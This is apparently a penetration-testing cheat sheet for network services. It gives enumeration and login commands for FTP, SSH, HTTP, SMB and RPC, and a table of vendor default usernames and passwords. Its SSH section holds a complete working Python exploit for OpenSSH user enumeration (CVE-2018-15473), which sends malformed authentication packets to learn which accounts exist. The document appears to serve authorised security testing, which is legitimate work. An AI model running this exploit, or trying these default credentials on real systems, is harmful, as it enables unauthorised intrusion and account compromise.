Network Services

FTP

Anonymous login

ftp anonymous@<target>  # No password needed

Auto login

sshpass -p '<password>' ftp <user>@<target>

Browser URL

ftp://<user>:<password>@<target>

SSL

lftp <target> -e "set ssl:verify-certificate no; set ftp:ssl-force true"

Download all files

wget -r --user='<user>' --password='<password>' ftp://<target>

SSH

Default credentials

Check for default credentials depending on the vendor:

| Vendor | Usernames | Passwords |
| --- | --- | --- |
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |

Source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh#default-credentials

Auto login

sshpass -p '<password>' ssh <user>@<target>

Private key login

ssh -i id_rsa <user>@<target>

Generate RSA keys

ssh-keygen -t rsa -f id_rsa

User enumeration - OpenSSH <7.7

Any version of OpenSSH up to 7.7 is vulnerable to user enumeration (CVE-2018-15473) if not patched. To exploit this vulnerability, we can use the following script:

ssh_user_enum.py
#!/usr/bin/env python2

import argparse
import logging
import paramiko
import socket
import sys
from colorama import init, Fore
from threading import Thread, current_thread, enumerate as enumerate_threads

class SSHUserChecker:
    def __init__(self, target, port=22):
        self.target = target
        self.port = port

        # Silence paramiko's transport logging
        logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

        # Hook paramiko's client-side message handlers: after SERVICE_ACCEPT the
        # userauth request is sent malformed, and a USERAUTH_FAILURE reply is
        # mapped to InvalidUsername (the patched server answers the same way
        # for every username, which is why this only works on unpatched hosts).
        self._old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
        paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = self._service_accept
        paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = self._invalid_username

    def _service_accept(self, *args, **kwargs):
        # From this point on, booleans are dropped from outgoing messages,
        # which malforms the publickey authentication request
        paramiko.message.Message.add_boolean = self._add_boolean
        return self._old_service_accept(*args, **kwargs)

    def _add_boolean(self, *args, **kwargs):
        pass

    def _invalid_username(self, *args, **kwargs):
        raise InvalidUsername()

    def check_user(self, username):
        sock = socket.socket()
        sock.connect((self.target, self.port))
        transport = paramiko.transport.Transport(sock)

        try:
            transport.start_client()
        except paramiko.ssh_exception.SSHException:
            print(Fore.RED + '\n[!] Failed to negotiate SSH transport for user: ' + username)
            return False

        try:
            # A throwaway key is enough: only the server's reaction to the
            # malformed packet matters, not whether the key is authorized
            transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
        except InvalidUsername:
            return False
        except paramiko.ssh_exception.AuthenticationException:
            return True
        return False

class InvalidUsername(Exception):
    pass

def check_user_wrapper(user_checker, username, valid_users, invalid_users):
    if user_checker.check_user(username):
        valid_users.append(username)
    else:
        invalid_users.append(username)

def main():
    parser = argparse.ArgumentParser(description='SSH User Enumeration')
    parser.add_argument('-u', '--username', help="Username to check for validity.")
    parser.add_argument('-w', '--wordlist', help="Wordlist file containing usernames to check.")
    parser.add_argument('-p', '--port', type=int, default=22, help="Set port of SSH service")
    parser.add_argument('target', help="IP address of the target system")

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    args = parser.parse_args()

    # Initialise colorama so colour codes are reset after each print
    init(autoreset=True)

    user_checker = SSHUserChecker(args.target, args.port)
    valid_users = []
    invalid_users = []

    if args.wordlist:
        with open(args.wordlist, 'r') as f:
            for line in f:
                username = line.strip()
                if not username:
                    continue
                t = Thread(target=check_user_wrapper, args=(user_checker, username, valid_users, invalid_users))
                t.start()
    else:
        if not args.username:
            parser.error("[!] You must specify either a username (-u) or a wordlist (-w).")
        else:
            t = Thread(target=check_user_wrapper, args=(user_checker, args.username, valid_users, invalid_users))
            t.start()

    # Wait for all threads to finish
    for t in enumerate_threads():
        if t != current_thread():
            t.join()

    if args.wordlist:
        if valid_users:
            print(Fore.GREEN + "\n[+] Valid users:")
            for user in valid_users:
                print(Fore.GREEN + "{}".format(user))
        else:
            print(Fore.RED + "\n[-] No valid users found.")
    else:
        if valid_users:
            print(Fore.GREEN + "\n[+] Valid user: {}".format(args.username))
        else:
            print(Fore.RED + "\n[-] Invalid user: {}".format(args.username))

if __name__ == "__main__":
    main()

HTTP/HTTPS

Web Technologies

whatweb http://<target>
I also recommend using this browser extension.

File and Directory Enumeration

nmap -p80,443 --script http-enum <target>
gobuster dir -u http://<target>/ -w wordlist.txt
wfuzz -w wordlist.txt http://<target>/FUZZ
# Good option for BurpSuite requests
ffuf -request request.txt -w wordlist.txt http://<target>/

Subdomain Enumeration

gobuster vhost -u http://<target>/ -w wordlist.txt
wfuzz -H 'Host: FUZZ.<target>' -w wordlist.txt http://<target>/

User input

Web Vulnerabilities

SMB

System enumeration with enum4linux

enum4linux -a [-u '<user>' -p '<password>'] <target>

Shares Enumeration

# null session
smbclient -N -L //<target>
# authenticated
smbclient -U '<user>[%<password>]' -L //<target>
# connect to a share
smbclient [-U '<user>[%<password>]'] //<target>/share

RPC

Automated Enumeration

rpcdump.py <target>

Manual Enumeration

# null session
rpcclient -U '' -N <target>
# authenticated
rpcclient -U '<user>%<password>' -N <target>
# run a single command (omit -U for a null session)
rpcclient [-U '<user>%<password>'] -N <target> -c 'command'
